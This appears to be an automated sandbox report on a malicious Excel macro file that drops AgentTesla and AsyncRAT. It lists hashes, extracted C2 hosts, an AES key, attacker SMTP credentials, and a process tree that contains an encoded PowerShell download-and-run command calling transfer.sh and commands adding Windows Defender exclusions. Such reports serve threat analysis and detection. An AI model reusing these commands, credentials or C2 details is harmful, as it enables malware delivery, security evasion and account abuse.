Analysis

  • max time kernel
    134s
  • max time network
    140s
  • platform
    windows7_x64
  • resource
    win7v20201028
  • submitted
    22-03-2021 17:22

General

  • Target

    PO-21322.xlsm

  • Size

    417KB

  • MD5

    e391234ad8969ee93813458c325194c4

  • SHA1

    cf4cbacbb5533ec90ec8215d01284d18b35dd139

  • SHA256

    2657a10c7ccd83fe042c172a67c31c3a40dfff1c97cc7549533b2af8de2eb88e

  • SHA512

    85fb0a3c785da2a5b7a407e052d02a9d17653fc3a8baa9f5b1693e266fb6e5acd2c548042218e53a8ceffd8a48081216fac5868ce05dc76e1defd8223c1fe091

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

http://transfer.sh/get/NTxd/notepad.exe

Extracted

Family

agenttesla

Credentials

  • Protocol:
    smtp
  • Host:
    smtp.gmail.com
  • Port:
    587
  • Username:
    zahimrahim18@gmail.com
  • Password:
    pifgweijlylkellk

Extracted

Family

asyncrat

Version

0.5.7B

C2

chongmei33.publicvm.com:2703

chongmei33.publicvm.com:49703

chongmei33.publicvm.com:49746

185.165.153.116:2703

185.165.153.116:49703

185.165.153.116:49746

54.37.36.116:2703

54.37.36.116:49703

54.37.36.116:49746

185.244.30.92:2703

185.244.30.92:49703

185.244.30.92:49746

dongreg202020.duckdns.org:2703

dongreg202020.duckdns.org:49703

dongreg202020.duckdns.org:49746

178.33.222.241:2703

178.33.222.241:49703

178.33.222.241:49746

rahim321.duckdns.org:2703

rahim321.duckdns.org:49703

Mutex

AsyncMutex_6SI8OkPnk

Attributes
  • aes_key

    hGScKRB0VrlS4WpFo0N7AmnZQApV4qsi

  • anti_detection

    false

  • autorun

    false

  • bdos

    false

  • delay

    FEB

  • host

    chongmei33.publicvm.com,185.165.153.116,54.37.36.116,185.244.30.92,dongreg202020.duckdns.org,178.33.222.241,rahim321.duckdns.org,79.134.225.92,37.120.208.36,178.33.222.243,87.98.245.48

  • hwid

    3

  • install_file

  • install_folder

    %AppData%

  • mutex

    AsyncMutex_6SI8OkPnk

  • pastebin_config

    null

  • port

    2703,49703,49746

  • version

    0.5.7B

aes.plain

Signatures

  • AgentTesla

    Agent Tesla is a remote access tool (RAT) written in visual basic.

  • AsyncRat

    AsyncRAT is designed to remotely monitor and control other computers.

  • Modifies Windows Defender Real-time Protection settings 3 TTPs
  • Modifies system executable filetype association 2 TTPs 1 IoCs
  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Windows security bypass 2 TTPs
  • AgentTesla Payload 5 IoCs
  • Async RAT payload 8 IoCs
  • Nirsoft 7 IoCs
  • Blocklisted process makes network request 1 IoCs
  • Executes dropped EXE 7 IoCs
  • Loads dropped DLL 22 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Windows security modification 2 TTPs 9 IoCs
  • Adds Run key to start application 2 TTPs 1 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 13 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • Drops file in Program Files directory 64 IoCs
  • Drops file in Windows directory 3 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Program crash 1 IoCs
  • Office loads VBA resources, possible macro or embedded object present
  • Delays execution with timeout.exe 1 IoCs
  • Enumerates system info in registry 2 TTPs 1 IoCs
  • Modifies Internet Explorer settings 1 TTPs 9 IoCs
  • Modifies registry class 1 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 24 IoCs
  • Suspicious use of AdjustPrivilegeToken 12 IoCs
  • Suspicious use of SetWindowsHookEx 5 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE
    "C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE" /dde C:\Users\Admin\AppData\Local\Temp\PO-21322.xlsm
    1⤵
    • Enumerates system info in registry
    • Modifies Internet Explorer settings
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:1616
    • C:\Windows\SysWOW64\cmd.exe
      cmd /c powershell.exe -encodedCommand KABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAEYAaQBsAGUAKAAnAGgAdAB0AHAAOgAvAC8AdAByAGEAbgBzAGYAZQByAC4AcwBoAC8AZwBlAHQALwBOAFQAeABkAC8AbgBvAHQAZQBwAGEAZAAuAGUAeABlACcALAAoACQAZQBuAHYAOgBhAHAAcABkAGEAdABhACkAKwAnAFwAZQB4AGMAZQBsAC4AZQB4AGUAJwApADsAUwB0AGEAcgB0AC0AUwBsAGUAZQBwACAAMgA7ACAAUwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgACQAZQBuAHYAOgBhAHAAcABkAGEAdABhAFwAZQB4AGMAZQBsAC4AZQB4AGUA
      2⤵
      • Process spawned unexpected child process
      • Suspicious use of WriteProcessMemory
      PID:268
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        powershell.exe -encodedCommand KABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAEYAaQBsAGUAKAAnAGgAdAB0AHAAOgAvAC8AdAByAGEAbgBzAGYAZQByAC4AcwBoAC8AZwBlAHQALwBOAFQAeABkAC8AbgBvAHQAZQBwAGEAZAAuAGUAeABlACcALAAoACQAZQBuAHYAOgBhAHAAcABkAGEAdABhACkAKwAnAFwAZQB4AGMAZQBsAC4AZQB4AGUAJwApADsAUwB0AGEAcgB0AC0AUwBsAGUAZQBwACAAMgA7ACAAUwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgACQAZQBuAHYAOgBhAHAAcABkAGEAdABhAFwAZQB4AGMAZQBsAC4AZQB4AGUA
        3⤵
        • Blocklisted process makes network request
        • Loads dropped DLL
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:368
        • C:\Users\Admin\AppData\Roaming\excel.exe
          "C:\Users\Admin\AppData\Roaming\excel.exe"
          4⤵
          • Executes dropped EXE
          • Loads dropped DLL
          • Windows security modification
          • Adds Run key to start application
          • Suspicious use of NtSetInformationThreadHideFromDebugger
          • Suspicious use of SetThreadContext
          • Drops file in Windows directory
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:1060
          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\Resources\Themes\aero\Shell\pPraIVNYqDZVfHUQ\svchost.exe" -Force
            5⤵
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:1932
          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\excel.exe" -Force
            5⤵
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:1604
          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\Resources\Themes\aero\Shell\pPraIVNYqDZVfHUQ\svchost.exe" -Force
            5⤵
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:756
          • C:\Users\Admin\AppData\Local\Temp\c8afd930-729d-4653-a2cd-7e0cd23c4899\AdvancedRun.exe
            "C:\Users\Admin\AppData\Local\Temp\c8afd930-729d-4653-a2cd-7e0cd23c4899\AdvancedRun.exe" /EXEFilename "C:\Users\Admin\AppData\Local\Temp\c8afd930-729d-4653-a2cd-7e0cd23c4899\test.bat" /WindowState ""0"" /PriorityClass ""32"" /CommandLine "" /StartDirectory "" /RunAs 8 /Run
            5⤵
            • Executes dropped EXE
            • Loads dropped DLL
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            • Suspicious use of WriteProcessMemory
            PID:1636
            • C:\Users\Admin\AppData\Local\Temp\c8afd930-729d-4653-a2cd-7e0cd23c4899\AdvancedRun.exe
              "C:\Users\Admin\AppData\Local\Temp\c8afd930-729d-4653-a2cd-7e0cd23c4899\AdvancedRun.exe" /SpecialRun 4101d8 1636
              6⤵
              • Executes dropped EXE
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              PID:772
          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\excel.exe" -Force
            5⤵
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:1576
          • C:\Windows\SysWOW64\cmd.exe
            "C:\Windows\System32\cmd.exe" /c timeout 1
            5⤵
            • Suspicious use of WriteProcessMemory
            PID:1312
          • C:\Users\Admin\AppData\Roaming\excel.exe
            "C:\Users\Admin\AppData\Roaming\excel.exe"
            5⤵
            • Executes dropped EXE
            • Loads dropped DLL
            PID:1864
            • C:\Users\Admin\AppData\Local\Temp\Fejanp.exe
              "C:\Users\Admin\AppData\Local\Temp\Fejanp.exe"
              6⤵
              • Modifies system executable filetype association
              • Executes dropped EXE
              • Loads dropped DLL
              • Drops file in Program Files directory
              • Drops file in Windows directory
              • Modifies registry class
              PID:1368
              • C:\Users\Admin\AppData\Local\Temp\3582-490\Fejanp.exe
                "C:\Users\Admin\AppData\Local\Temp\3582-490\Fejanp.exe"
                7⤵
                • Executes dropped EXE
                PID:1744
            • C:\Users\Admin\AppData\Local\Temp\Bfllp.exe
              "C:\Users\Admin\AppData\Local\Temp\Bfllp.exe"
              6⤵
              • Executes dropped EXE
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              PID:1996
              • C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe
                dw20.exe -x -s 520
                7⤵
                • Loads dropped DLL
                PID:1388
          • C:\Windows\SysWOW64\WerFault.exe
            C:\Windows\SysWOW64\WerFault.exe -u -p 1060 -s 1560
            5⤵
            • Loads dropped DLL
            • Program crash
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:1768
  • C:\Windows\SysWOW64\timeout.exe
    timeout 1
    1⤵
    • Delays execution with timeout.exe
    PID:1952

Network

MITRE ATT&CK Matrix ATT&CK v6

Persistence

Modify Existing Service

1
T1031

Change Default File Association

1
T1042

Registry Run Keys / Startup Folder

1
T1060

Defense Evasion

Modify Registry

6
T1112

Disabling Security Tools

3
T1089

Credential Access

Credentials in Files

1
T1081

Discovery

System Information Discovery

2
T1082

Query Registry

1
T1012

Collection

Data from Local System

1
T1005

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_03bfaf74-c48a-406b-812c-2684df821d22
    MD5

    597009ea0430a463753e0f5b1d1a249e

    SHA1

    4e38b8bb65ecbd5c9f0d3d8c47f7caba33de6c62

    SHA256

    3fd2a8217a845c43dbc0dc206c28be81d2687aa9ba62019d905aef10cfaec45d

    SHA512

    5d722fa908e64575b2497c60d142e182011a10c6ed33813b3b4796b3147ece1bc96938518b4c8911a1bac3b7560528ebe3e8e754c11015516d335df5d7c6871d

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_1b0b2f5a-4fa9-4284-9780-9a1da7b14a47
    MD5

    02ff38ac870de39782aeee04d7b48231

    SHA1

    0390d39fa216c9b0ecdb38238304e518fb2b5095

    SHA256

    fbd66a9baf753db31b8de23f2d51b67f8676687503653103080c45b16f1dc876

    SHA512

    24a1ff76ee42ff7a5ea42843928c4df07b06178f7781cd840e1e086e88735d81506eb67259ff1e6ce5aaa7c5baea03886da265eb7e025ff4dc4c4b5f8cd3e341

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_2468a564-147f-4ab5-bd35-9a5d4532ba40
    MD5

    7f79b990cb5ed648f9e583fe35527aa7

    SHA1

    71b177b48c8bd745ef02c2affad79ca222da7c33

    SHA256

    080ec69d3f2abac629a0bdc314f150ad42a9a1b0a031b1d5c7b5b80051c48683

    SHA512

    20926edf7f0b990da4bd8d7ba91bd8bf7b952b75080f687afa7197a91777604688303d38b4a0a7240b558c23f2e0cd927d3590765109f8be0551f5eb050eafda

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_4d64d698-6eb1-47cf-a5ef-40c771ce88ca
    MD5

    d89968acfbd0cd60b51df04860d99896

    SHA1

    b3c29916ccb81ce98f95bbf3aa8a73de16298b29

    SHA256

    1020cc7c929cd5a4e68ccb40353ca76f427df363f0d95e456eb79db039bdb2b9

    SHA512

    b0e886cce598371b59131fed1535e220c798691bad93ef9474ba440066f5a6bd77a60966604b7a5ff6298b2e200c9dd0c8f9f04aff208b2af423480ead4e8842

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_85c7c16f-de6b-4cda-bf8a-ede9c5910d3d
    MD5

    df44874327d79bd75e4264cb8dc01811

    SHA1

    1396b06debed65ea93c24998d244edebd3c0209d

    SHA256

    55de642c5c9e436ec01c57004dae797022442c3245daf7162d19a5585f221181

    SHA512

    95dc9298b8db059bbe746f67e6a7f8515781c7053cc60c01532e47623a996be7e1bd23d1bd8f5f2045adff27454f44930d503c15b695690088841cedbd2a06c3

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_8b0e227c-1cb3-457e-93ee-c1c479d1f915
    MD5

    354b8209f647a42e2ce36d8cf326cc92

    SHA1

    98c3117f797df69935f8b09fc9e95accfe3d8346

    SHA256

    feae405d288fdd38438f9d9b54f791f3ce3805f1bb88780da5aca402ad372239

    SHA512

    420be869b58e9a7a2c31f2550ac269df832935692a6431d455a10d9b426781e79d91e30ace2c465633b8a7ff2be1bf49734d8b99a390090dc4b36411d4391ff0

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_a02197da-f9c8-43e6-9ff1-846e01d2d404
    MD5

    75a8da7754349b38d64c87c938545b1b

    SHA1

    5c28c257d51f1c1587e29164cc03ea880c21b417

    SHA256

    bf08151c174b5d00c9dbc7907b2c6a01b4be76bfa3afce1e8bd98a04ad833c96

    SHA512

    798797bc74c56c874e9a5fdcb0157c04e37a1b3cce285ef064b01bceef8cec45f11a5198918c6c647220b62883606b5e12e3cca3ea369f3a66e69dea6e15f643

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_b771b377-145f-49e9-bf64-45e69646f7b9
    MD5

    5e3c7184a75d42dda1a83606a45001d8

    SHA1

    94ca15637721d88f30eb4b6220b805c5be0360ed

    SHA256

    8278033a65d1ff48be4d86e11f87930d187692f59f8bf2f0a9d170de285afb59

    SHA512

    fae99b6e9b106e0f1c30aa4082b25ae1ad643455c1295c2c16ad534e3e611b9b08492353ffe1af1cfdddc9b2b7c330747a64012c45e62b8f4a4982dcc214e05b

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_c356f451-13b2-41fc-8d4c-54a293efa6e1
    MD5

    b6d38f250ccc9003dd70efd3b778117f

    SHA1

    d5a17c02cac698d4f0a4a9b7d71db2aa19e3f18a

    SHA256

    4de9d7b5ccab7b67ca8efc83084c7ee6e5e872b7216ed4683bc5da950bf41265

    SHA512

    67d8195836b7f280d3f9219fd0f58276342e55d5dfdd8a4c54355030d96685d73f1b2b6da0eb39322ec7c3a1d1c5ef06b52d22646cea30a96f822de1800d31e9

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_cacbe3a0-6fd3-4d06-9979-7f69d2ebd64e
    MD5

    a70ee38af4bb2b5ed3eeb7cbd1a12fa3

    SHA1

    81dbaeae4b0f9e1adc0a1e3d6d76a12396498ba9

    SHA256

    dd2f41f92f19c3fe031bdf5da68ab06768e26762d0077b290cd0094df1d5d58d

    SHA512

    8c69a5300c7545c5c4b25a0594e6813b6b7a85b5f3ae7fc5464b4074fe6f50b2f49d31cacf19bc20a02bb8e237656f1b9b2a3f6a3953e3a8478ca2adc154e0e3

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_ce569c42-07bf-442e-b377-8e9695c9383c
    MD5

    be4d72095faf84233ac17b94744f7084

    SHA1

    cc78ce5b9c57573bd214a8f423ee622b00ebb1ec

    SHA256

    b0d72c5c22e57913476ac8fc686a4593f137c6667d5094522c0a0685dabd7adc

    SHA512

    43856e9b1032b8690ceea810c931bed3655e9190414bb220fb6afc136f31b8335e07604dffb28405d4006f266a54cff424c527d29924b1b732c9647a3252b097

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_dadf780e-0f00-49bb-86e1-35585efd8a97
    MD5

    a725bb9fafcf91f3c6b7861a2bde6db2

    SHA1

    8bb5b83f3cc37ff1e5ea4f02acae38e72364c114

    SHA256

    51651f27f54c7261887037aa1de4eff0a26c6807906dfc34a15cd5a0b58a8431

    SHA512

    1c4b21dd5660bfec8347257bb3da64681b0a97c427790d9ab3484f687dac032bcff0e07876635953697b00cf83e7d37f97c44e0219627fd0533f60ed3024b97e

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex
    MD5

    d793a0c299c465f8e70076364a98787b

    SHA1

    9e864fdde07170cb8c5203bb0c9ad1511fe4dd54

    SHA256

    a8bf15706598b20740e958a4985174bfede9e46956a633250388ca52277be60e

    SHA512

    00ee8e8ad7943f48a0c06c2523a58d6a99e996e4eeb13ce2d33c6fcbec993016e362b64917ff094141bd1b7a4b45cccab063bfe3e2fbedd3f0762621aced54bd

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex
    MD5

    d793a0c299c465f8e70076364a98787b

    SHA1

    9e864fdde07170cb8c5203bb0c9ad1511fe4dd54

    SHA256

    a8bf15706598b20740e958a4985174bfede9e46956a633250388ca52277be60e

    SHA512

    00ee8e8ad7943f48a0c06c2523a58d6a99e996e4eeb13ce2d33c6fcbec993016e362b64917ff094141bd1b7a4b45cccab063bfe3e2fbedd3f0762621aced54bd

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex
    MD5

    7a9ae50fad82f884920ab0ebe4b976bc

    SHA1

    b88444d558dcc98fc5228ee9f2b9226e2202b064

    SHA256

    8f0b0eabf9e6f8458cca0400299b31a2c6d5e0168b1039d4e36017db5c951af8

    SHA512

    156d1a58dbda380864c10114095a103e90a8ef84467c655994044109272f4955d06d8e00b6160260c5ab5447a99de5e5ba3788d1b46db622e9de2cce73aa0787

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex
    MD5

    98870105f225ddae14ae2779d5f67956

    SHA1

    823a681bdebe4e4c157ad3cdb5c9b149eef34bd5

    SHA256

    7c3b9d4d0fabd89acf7b40dd46ab114bac9c2bc9cafa582e2d801781a0c7702b

    SHA512

    316b6430d9d684bee13b4663b49cf69c49ec778ddc59ddedef8a7b155ef833593dea6e5e6d4d4d7ba60f109f2b4265419ee1486877787333f7aed943f2079343

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex
    MD5

    7ddf9c218147699d548e45cfe17dbf5f

    SHA1

    7063e8996bf5a62ddd1e292954ac9b7562e0afcd

    SHA256

    9f99bff9a48144768cfc6d0fa7dc8fd511905a633a7cbd3fd7543ff31b12c8e6

    SHA512

    16f4f1b8293d67bc1d4b6dc40036f5707b33bee27245ff939c940f23c28b17ef786298fa6ed1367775bc5481b85d1f78e621dfc49eeb360f60750cfef344b648

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex
    MD5

    74b36c2bbdbb9b2d5fb6f5ccfa705374

    SHA1

    89826958583311fbe4752212d65543aa7b7b4220

    SHA256

    97ec1a855c3e60c85a261e298b2f91f95dd75d27dd6a9579a267685308415679

    SHA512

    d940b4f364b0c854359cbe6b003b112e92309239bf0a7e24855909c21eef18b71c49ba7e5fd7552338b599cdcc32f2985b8aacb02f1ee4ba155ba83d4843bd3d

  • C:\Users\Admin\AppData\Local\Temp\3582-490\Fejanp.exe
    MD5

    4002e78d30d455d41d4d7657ebd80aaa

    SHA1

    f9327ee332dd868b9b20cea5f95a51cbc2ce4afe

    SHA256

    c3d42a1c484ea9bf50c0de1c356dee5dc83541caff8e3acea4b396b13bf1d06f

    SHA512

    01b044a2f23f3ea38ce67f760744d4508a17ceef69b97c0d58368b31a9f8dd124b07bfcd9331ad9007edaa351bf303f952f479c398dd3a1ada5142a1ced6e9ed

  • C:\Users\Admin\AppData\Local\Temp\3582-490\Fejanp.exe
    MD5

    4002e78d30d455d41d4d7657ebd80aaa

    SHA1

    f9327ee332dd868b9b20cea5f95a51cbc2ce4afe

    SHA256

    c3d42a1c484ea9bf50c0de1c356dee5dc83541caff8e3acea4b396b13bf1d06f

    SHA512

    01b044a2f23f3ea38ce67f760744d4508a17ceef69b97c0d58368b31a9f8dd124b07bfcd9331ad9007edaa351bf303f952f479c398dd3a1ada5142a1ced6e9ed

  • C:\Users\Admin\AppData\Local\Temp\Bfllp.exe
    MD5

    b3b986214fdf210585adaf1cd74e9616

    SHA1

    2c9d727fdd3cfbaf34d45dcd8ff8fa537c21e771

    SHA256

    5c5fe5f046660da5c3784b3bf03111dd5dcb3e5fa8dd4ce94acc66f4d960a0cc

    SHA512

    3a4b37a8e4da4a4584b56a9a87cd38cb83bda5ce9fe1e701bc346855a712038e9c581e73a6f2c2f0ac9732dba3964aa158de7f880fef69cacb00e7d14725fa53

  • C:\Users\Admin\AppData\Local\Temp\Bfllp.exe
    MD5

    b3b986214fdf210585adaf1cd74e9616

    SHA1

    2c9d727fdd3cfbaf34d45dcd8ff8fa537c21e771

    SHA256

    5c5fe5f046660da5c3784b3bf03111dd5dcb3e5fa8dd4ce94acc66f4d960a0cc

    SHA512

    3a4b37a8e4da4a4584b56a9a87cd38cb83bda5ce9fe1e701bc346855a712038e9c581e73a6f2c2f0ac9732dba3964aa158de7f880fef69cacb00e7d14725fa53

  • C:\Users\Admin\AppData\Local\Temp\Fejanp.exe
    MD5

    e97bc72e803c3c3cdc35fc13274bf0ad

    SHA1

    8f262f8a90cbe8438c0b28afe9bd22c0695c698c

    SHA256

    55dda38d22d983035b6b6f8d2c9c5c299e99295745538b45d1a468864dbceb3e

    SHA512

    74fccc37e2b024d2c4630fe3cb7455a9f144902847a4207ea7502bc79250bd79773eb22fe26e11f821c238f0f061dbe0883d81ee9df5fc69d17bf277633842f9

  • C:\Users\Admin\AppData\Local\Temp\Fejanp.exe
    MD5

    e97bc72e803c3c3cdc35fc13274bf0ad

    SHA1

    8f262f8a90cbe8438c0b28afe9bd22c0695c698c

    SHA256

    55dda38d22d983035b6b6f8d2c9c5c299e99295745538b45d1a468864dbceb3e

    SHA512

    74fccc37e2b024d2c4630fe3cb7455a9f144902847a4207ea7502bc79250bd79773eb22fe26e11f821c238f0f061dbe0883d81ee9df5fc69d17bf277633842f9

  • C:\Users\Admin\AppData\Local\Temp\c8afd930-729d-4653-a2cd-7e0cd23c4899\AdvancedRun.exe
    MD5

    17fc12902f4769af3a9271eb4e2dacce

    SHA1

    9a4a1581cc3971579574f837e110f3bd6d529dab

    SHA256

    29ae7b30ed8394c509c561f6117ea671ec412da50d435099756bbb257fafb10b

    SHA512

    036e0d62490c26dee27ef54e514302e1cc8a14de8ce3b9703bf7caf79cfae237e442c27a0edcf2c4fd41af4195ba9ed7e32e894767ce04467e79110e89522e4a

  • C:\Users\Admin\AppData\Local\Temp\c8afd930-729d-4653-a2cd-7e0cd23c4899\AdvancedRun.exe
    MD5

    17fc12902f4769af3a9271eb4e2dacce

    SHA1

    9a4a1581cc3971579574f837e110f3bd6d529dab

    SHA256

    29ae7b30ed8394c509c561f6117ea671ec412da50d435099756bbb257fafb10b

    SHA512

    036e0d62490c26dee27ef54e514302e1cc8a14de8ce3b9703bf7caf79cfae237e442c27a0edcf2c4fd41af4195ba9ed7e32e894767ce04467e79110e89522e4a

  • C:\Users\Admin\AppData\Local\Temp\c8afd930-729d-4653-a2cd-7e0cd23c4899\AdvancedRun.exe
    MD5

    17fc12902f4769af3a9271eb4e2dacce

    SHA1

    9a4a1581cc3971579574f837e110f3bd6d529dab

    SHA256

    29ae7b30ed8394c509c561f6117ea671ec412da50d435099756bbb257fafb10b

    SHA512

    036e0d62490c26dee27ef54e514302e1cc8a14de8ce3b9703bf7caf79cfae237e442c27a0edcf2c4fd41af4195ba9ed7e32e894767ce04467e79110e89522e4a

  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
    MD5

    76479a8ead7ee1db2fc001ac2e3151eb

    SHA1

    040fffcc3394a137cc124d62d8471d0c99559472

    SHA256

    b54c389fe03af89954546ca9195fefa0bf569e99ab3bf9607eea548f99953958

    SHA512

    f9ee2794b88a55ffdeeb780994730d7c6fd951d7374d62dda97e23d230b93601017a4a48aa81f0d772f09c88748b78348f896e2417834783ff272ab59e703912

  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
    MD5

    76479a8ead7ee1db2fc001ac2e3151eb

    SHA1

    040fffcc3394a137cc124d62d8471d0c99559472

    SHA256

    b54c389fe03af89954546ca9195fefa0bf569e99ab3bf9607eea548f99953958

    SHA512

    f9ee2794b88a55ffdeeb780994730d7c6fd951d7374d62dda97e23d230b93601017a4a48aa81f0d772f09c88748b78348f896e2417834783ff272ab59e703912

  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
    MD5

    76479a8ead7ee1db2fc001ac2e3151eb

    SHA1

    040fffcc3394a137cc124d62d8471d0c99559472

    SHA256

    b54c389fe03af89954546ca9195fefa0bf569e99ab3bf9607eea548f99953958

    SHA512

    f9ee2794b88a55ffdeeb780994730d7c6fd951d7374d62dda97e23d230b93601017a4a48aa81f0d772f09c88748b78348f896e2417834783ff272ab59e703912

  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
    MD5

    76479a8ead7ee1db2fc001ac2e3151eb

    SHA1

    040fffcc3394a137cc124d62d8471d0c99559472

    SHA256

    b54c389fe03af89954546ca9195fefa0bf569e99ab3bf9607eea548f99953958

    SHA512

    f9ee2794b88a55ffdeeb780994730d7c6fd951d7374d62dda97e23d230b93601017a4a48aa81f0d772f09c88748b78348f896e2417834783ff272ab59e703912

  • C:\Users\Admin\AppData\Roaming\excel.exe
    MD5

    08a6b5abb10b85864749af27b0a98d53

    SHA1

    b3a74ca9490e73b16fea1e6357787f2b4ea49f6c

    SHA256

    8b37d42240c83ee1de8923ebd5365b5ff25fd204d3389e16f2a9d92237fcfbba

    SHA512

    23f9fb96107b87d6105fa045bcb714e9fedf4238414a30b62235664420680622990534782e5c12ca141c7af493c9f29264c91d5611bf19b255e138768d0c2ad4

  • C:\Users\Admin\AppData\Roaming\excel.exe
    MD5

    08a6b5abb10b85864749af27b0a98d53

    SHA1

    b3a74ca9490e73b16fea1e6357787f2b4ea49f6c

    SHA256

    8b37d42240c83ee1de8923ebd5365b5ff25fd204d3389e16f2a9d92237fcfbba

    SHA512

    23f9fb96107b87d6105fa045bcb714e9fedf4238414a30b62235664420680622990534782e5c12ca141c7af493c9f29264c91d5611bf19b255e138768d0c2ad4

  • C:\Users\Admin\AppData\Roaming\excel.exe
    MD5

    08a6b5abb10b85864749af27b0a98d53

    SHA1

    b3a74ca9490e73b16fea1e6357787f2b4ea49f6c

    SHA256

    8b37d42240c83ee1de8923ebd5365b5ff25fd204d3389e16f2a9d92237fcfbba

    SHA512

    23f9fb96107b87d6105fa045bcb714e9fedf4238414a30b62235664420680622990534782e5c12ca141c7af493c9f29264c91d5611bf19b255e138768d0c2ad4

  • \PROGRA~2\Adobe\READER~1.0\Reader\LOGTRA~1.EXE
    MD5

    9e2b9928c89a9d0da1d3e8f4bd96afa7

    SHA1

    ec66cda99f44b62470c6930e5afda061579cde35

    SHA256

    8899b4ed3446b7d55b54defbc1acb7c5392a4b3bc8ec2cdc7c31171708965043

    SHA512

